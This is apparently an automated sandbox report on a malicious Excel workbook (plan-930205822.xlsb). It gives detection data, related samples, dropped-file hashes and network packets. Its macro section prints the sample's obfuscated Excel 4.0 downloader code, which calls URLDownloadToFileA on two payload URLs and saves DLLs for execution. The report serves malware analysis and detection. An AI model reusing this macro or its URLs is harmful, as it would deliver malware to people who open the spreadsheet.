                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal84.expl.evad.winXLSB@5/4@2/1
                                                                                                                                                EGA Information:Failed
                                                                                                                                                HDC Information:Failed
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .xlsb
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
                                                                                                                                                • Scroll down
                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 40.88.32.150, 52.109.88.177, 52.109.88.39, 52.109.76.35, 104.43.193.48, 20.50.102.62, 13.107.42.23, 13.107.5.88, 23.211.4.86, 40.112.88.60, 205.185.216.42, 205.185.216.10, 20.82.210.154, 80.67.82.211, 80.67.82.235
                                                                                                                                                • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, e-0009.e-msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, config-edge-skype.l-0014.l-msedge.net, l-0014.config.skype.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, au-bg-shim.trafficmanager.net, afdo-tas-offload.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, l-0014.l-msedge.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                No simulations

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                50.116.92.246plan-277786552.xlsbGet hashmaliciousBrowse

                                                                                                                                                  Domains

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  carpascapital.complan-277786552.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  gruasphenbogota.complan-277786552.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246

                                                                                                                                                  ASN

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  UNIFIEDLAYER-AS-1US7UXBXIr31E.exeGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.198.10
                                                                                                                                                  TW8o2zNu2Q.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.109.135
                                                                                                                                                  xwKdahKPn8.exeGet hashmaliciousBrowse
                                                                                                                                                  • 108.167.164.216
                                                                                                                                                  plan-277786552.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  Order.exeGet hashmaliciousBrowse
                                                                                                                                                  • 108.167.183.94
                                                                                                                                                  0rder-bcm_23062021.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.87.249.240
                                                                                                                                                  wdxYcFUCJV.exeGet hashmaliciousBrowse
                                                                                                                                                  • 74.220.199.6
                                                                                                                                                  Inv 820984.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 162.144.12.168
                                                                                                                                                  N0vpYgIYpv.exeGet hashmaliciousBrowse
                                                                                                                                                  • 162.241.216.218
                                                                                                                                                  droxoUY6SU.exeGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.185.25
                                                                                                                                                  idea-22543577.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 108.167.165.249
                                                                                                                                                  idea-22543577.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 108.167.165.249
                                                                                                                                                  Fra8994.exeGet hashmaliciousBrowse
                                                                                                                                                  • 162.241.60.126
                                                                                                                                                  WXs8v9QuE7.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.87.146.99
                                                                                                                                                  tender-1235416393.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.88.195
                                                                                                                                                  tender-1235416393.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.88.195
                                                                                                                                                  Order.exeGet hashmaliciousBrowse
                                                                                                                                                  • 108.167.183.94
                                                                                                                                                  Habib_Bank Payment Advice.doc__.rtfGet hashmaliciousBrowse
                                                                                                                                                  • 162.144.79.7
                                                                                                                                                  heoN5wnP2d.exeGet hashmaliciousBrowse
                                                                                                                                                  • 74.220.199.8
                                                                                                                                                  FidKy67SWO.exeGet hashmaliciousBrowse
                                                                                                                                                  • 192.254.185.252

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19mCzW1o1ZtQ.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  Receipt_ID544663355899706.jsGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  Receipt_ID544663355899706.jsGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  ol3LDsjE6A.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  ol3LDsjE6A.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  Z2YNNlDA9o.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  ZPO1ZXwaGR.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  T4j76UbWCy.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  6D03.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  9i70IpVwXU.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  update2.zip.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  Build.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  plan-277786552.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  Declaration-Of-Independence-Crossword-Puzzle-Answers-Quizlet.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  instagrampassword_setup.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  bmaphis@cardinaltek.com_16465506 AMDocAtt.HTMLGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  twd.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  0ZQNzv3MyU.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  USD 12,371.35 SWIFT report.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246
                                                                                                                                                  PAYMENT COPY.pptGet hashmaliciousBrowse
                                                                                                                                                  • 50.116.92.246

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\57891FD6-44C4-41E2-9BAC-FD1A025B680A
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):134914
                                                                                                                                                  Entropy (8bit):5.367834958853468
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:bcQIKNgeBXA3gBwlpQ9DQW+z7Y34ZliKWXboOidX5E6LWME9:rEQ9DQW+zvXO1
                                                                                                                                                  MD5:80F44E4B6041D4F709F3096C5D35EA67
                                                                                                                                                  SHA1:0A12CFE1F4BB3B79C8699B4C4591EB1AAFBBF7AE
                                                                                                                                                  SHA-256:80E63F5FEF469A99F9F784E070D8F9F60FDAFA6235C5D6060E6267BF8E26A6AA
                                                                                                                                                  SHA-512:4D34D2645F1F1B61BA7E58A7D28676F7A3595AF03798835F5F09877D0874BF4E44BE0BFF786DC661F5E75540A83386462F7FFCAFABBFBDCF017FA1CD01C36D39
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-24T05:08:10">.. Build: 16.0.14222.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\FCD3AD83.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 1133 x 589, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):75711
                                                                                                                                                  Entropy (8bit):7.915372969602997
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:gxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncT:7br0o45GUgHhX8jC9yST
                                                                                                                                                  MD5:8296338A43942E3107802E3062AC1270
                                                                                                                                                  SHA1:46E67A586ED8A961AF7FD03140547C1CB2BAC227
                                                                                                                                                  SHA-256:BE5F61F2AE8E4C9F9ADBCE5EC33D4C01A331734FFC5818AA8E45CF60456C5ABD
                                                                                                                                                  SHA-512:C2179050A009C990CBFE6EA45E44AA6307AAC938E3EA523D31713F657E09131B07ACEBB31FC353C5A23E7D6323C4EC01736CFF092ACA1D49B58E71A07F1171AD
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: .PNG........IHDR...m...M......p......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^......g......q.|.....<...'r....-^..c.If.,ffX1K.[....Z....V.LO5L..J+...z.]]u..>.==.......................Q..........(.......p.t........8.:.............................g@G........3............Q..........(.......p.t........8.:.............................g@G........3............Q..........(.......p.t......j.7ZP...:...0S....z5T........).WU=j.*.$H.B.P.)l.6Q..'.l..7..k..J.o..._....6..{C...r.|2W.[a...m.BI.?...5......D....4;B...@b.HiP.jfj}@.S9..E.*J...O..BA5.e:...q!.SP....w....(..._.,..I.|a.7+>.........A#......3v..37......w(..j...C.R..H3.f.Q....0....h~...)aM..).vQ.1..+J@Q.....Oa+...!5.e.b...V..|..d../.......vC..&..=9...n.....^6-.tRj...O..{j.e.N....o..~..^.......#!...T...C.#.>.E,[.,......E....h~B.Y./....(2.......(...`....~w#.%..R..{........N.Z....k]8>..dW..^s....U...9...W.e...]...W...i.{u.>.s.,L.>1..)....f..b..Z.nai$.Q.."...W2.......Q...G...z....Ea......
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\75810000
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):113222
                                                                                                                                                  Entropy (8bit):7.875738732899415
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:PKYUOtOpEknvGrnxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncVd:PKY45br0o45GUgHhX8jC9ySVd
                                                                                                                                                  MD5:04EC9A165F91EEEC2E1A16D7D458083E
                                                                                                                                                  SHA1:DE28E006BB4E61BEE221F2AED03D3126AB2AECE6
                                                                                                                                                  SHA-256:5BC4685E6B2D3D3AE48640631C40E4DF03CD9D0E8244D55CD71C365AD07C3A3D
                                                                                                                                                  SHA-512:6ECE536BD31A66300CFACEA3B7A90D452DD2950DD3838C89E123B5B3080490B9BBB423C90B341411425E60C1324278325454AFBCAF189F3E37C53A971A017DE4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: ...N.1....x...h.EUU..h. .>..>.X.M>....3....U......./....#&2.........U/~..h...2x.6x...I\-.>....a..^.9.R....u!..eH.2......By9.}.*..>..x...;.....z..;..W....W.za\.vyP......h...s..^..jG...u..&.9..#...fz.0.nx1....B.?.1..X....>.uw.P:jq..v4 ..J...E.....$U%...xG...k.ri....oSG1!.j.lWfR.'8*..b|.......L.e>z(....W..@.[.....3.J. .................?N_...X.....".%...W....l.)..W....'r....X.8..@..W..........PK..........!.j.9.............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H......
                                                                                                                                                  C:\Users\user\Desktop\~$plan-930205822.xlsb
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):165
                                                                                                                                                  Entropy (8bit):1.6081032063576088
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                  MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                  SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                  SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                  SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:Microsoft Excel 2007+
                                                                                                                                                  Entropy (8bit):7.836343677163856
                                                                                                                                                  TrID:
                                                                                                                                                  • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                  • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                  • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                  File name:plan-930205822.xlsb
                                                                                                                                                  File size:90078
                                                                                                                                                  MD5:a9632052eafc78ee7e2225a59aefa468
                                                                                                                                                  SHA1:2bade21221f175cda46c2d819746674579f28f2d
                                                                                                                                                  SHA256:ae39ed7fd03aae627c65cdb4d7fb0a938fc4f328e2611da087589cc57ca7c3dd
                                                                                                                                                  SHA512:456e69cd6a23c6a0011a50d3e8ba71314b3b33c59f9c1d71430fc821bb48239257c8622f48f18c7ffa8a0475c269086035efa7c7a1024e6c687c33f382779845
                                                                                                                                                  SSDEEP:1536:4lHoxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncjv0/Ci:ADbr0o45GUgHhX8jC9ySa
                                                                                                                                                  File Content Preview:PK..........!..#..............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                  Static OLE Info

                                                                                                                                                  General

                                                                                                                                                  Document Type:OpenXML
                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                  OLE File "plan-930205822.xlsb"

                                                                                                                                                  Indicators

                                                                                                                                                  Has Summary Info:
                                                                                                                                                  Application Name:
                                                                                                                                                  Encrypted Document:
                                                                                                                                                  Contains Word Document Stream:
                                                                                                                                                  Contains Workbook/Book Stream:
                                                                                                                                                  Contains PowerPoint Document Stream:
                                                                                                                                                  Contains Visio Document Stream:
                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                  Flash Objects Count:
                                                                                                                                                  Contains VBA Macros:

                                                                                                                                                  Macro 4.0 Code

                                                                                                                                                  ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\gihi1.dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\gihi2.dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""https://carpascapital.com/gBPg8MtsGbv/ka.html""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""https://gruasphenbogota.com/C74hwGGxi/ka.html""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,URLDow,CC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,nload,BB,,"=FORMULA(before.2.0.0.sheet!BG27&before.2.0.0.sheet!BG28&before.2.0.0.sheet!BG29,before.2.0.0.sheet!BL47)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,To,,,"=FORMULA(before.2.0.0.sheet!BG11&before.2.0.0.sheet!BG12&before.2.0.0.sheet!BG13&before.2.0.0.sheet!BG14&before.2.0.0.sheet!BG15,before.2.0.0.sheet!BL48)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Fil,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""rsthYFGIPUYiugeA"",2)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=,=,,"=FORMULA.ARRAY(BH10&BH11&BH12,before.2.0.0.sheet!BL49)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,CALL,,"=FORMULA.ARRAY(BG33&BG34&BG35&BG36&BG37&BG38&BG39&""2 "",before.2.0.0.sheet!BO52)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA(BH19&BH20&BH33&before.2.0.0.sheet!BL47&BH34&BH37&BH34&before.2.0.0.sheet!BL48&BH34&BH37&BH34&before.2.0.0.sheet!BL49&BH34&BH37&BH39&BH37&BH34&BG5&BH34&BH37&BH34&BG2&BH34&BH37&BH39&BH37&BH39&BH36,before.2.0.0.sheet!BJ47)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,URL,,,"=FORMULA(BH19&BH20&BH33&before.2.0.0.sheet!BL47&BH34&BH37&BH34&before.2.0.0.sheet!BL48&BH34&BH37&BH34&before.2.0.0.sheet!BL49&BH34&BH37&BH39&BH37&BH34&BG6&BH34&BH37&BH34&BG3&BH34&BH37&BH39&BH37&BH39&BH36,before.2.0.0.sheet!BJ48)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,M,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,on,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA(BI32&BI33&BI34&BI35,BL50)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,""")",E,"=FORMULA(BG19&BL50&before.2.0.0.sheet!BO52&before.2.0.0.sheet!BG2&before.2.0.0.sheet!BH32,before.2.0.0.sheet!BJ49)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""","(""",X,"=FORMULA(BG19&BL50&before.2.0.0.sheet!BO52&before.2.0.0.sheet!BG3&before.2.0.0.sheet!BH32,before.2.0.0.sheet!BJ50)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,"""",E,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e,&,C,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,g,),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,s,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                                                  Network Behavior

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jun 24, 2021 07:08:13.168035030 CEST49715443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:13.326165915 CEST4434971550.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:13.326387882 CEST49715443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:13.328440905 CEST49715443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:13.486447096 CEST4434971550.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:13.509474993 CEST4434971550.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:13.509520054 CEST4434971550.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:13.509557962 CEST4434971550.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:13.509579897 CEST49715443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:13.509584904 CEST4434971550.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:13.509634018 CEST49715443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:13.509710073 CEST49715443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:13.510010958 CEST4434971550.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:13.510086060 CEST49715443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:13.531800985 CEST49715443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:13.708539963 CEST4434971550.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:13.708673000 CEST49715443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:13.710227966 CEST49715443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:13.918590069 CEST4434971550.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:14.408952951 CEST4434971550.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:14.409236908 CEST49715443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:14.410950899 CEST4434971550.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:14.411148071 CEST49715443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:14.493164062 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:14.663167000 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:14.663413048 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:14.664649010 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:14.824253082 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:14.899493933 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:14.899547100 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:14.899584055 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:14.899611950 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:14.899621010 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:14.899652004 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:14.899714947 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:14.905570984 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:14.905666113 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:14.921569109 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:15.079626083 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:15.173259974 CEST4434971850.116.92.246192.168.2.3
                                                                                                                                                  Jun 24, 2021 07:08:15.173376083 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:15.174978971 CEST49718443192.168.2.350.116.92.246
                                                                                                                                                  Jun 24, 2021 07:08:15.333323956 CEST4434971850.116.92.246192.168.2.3
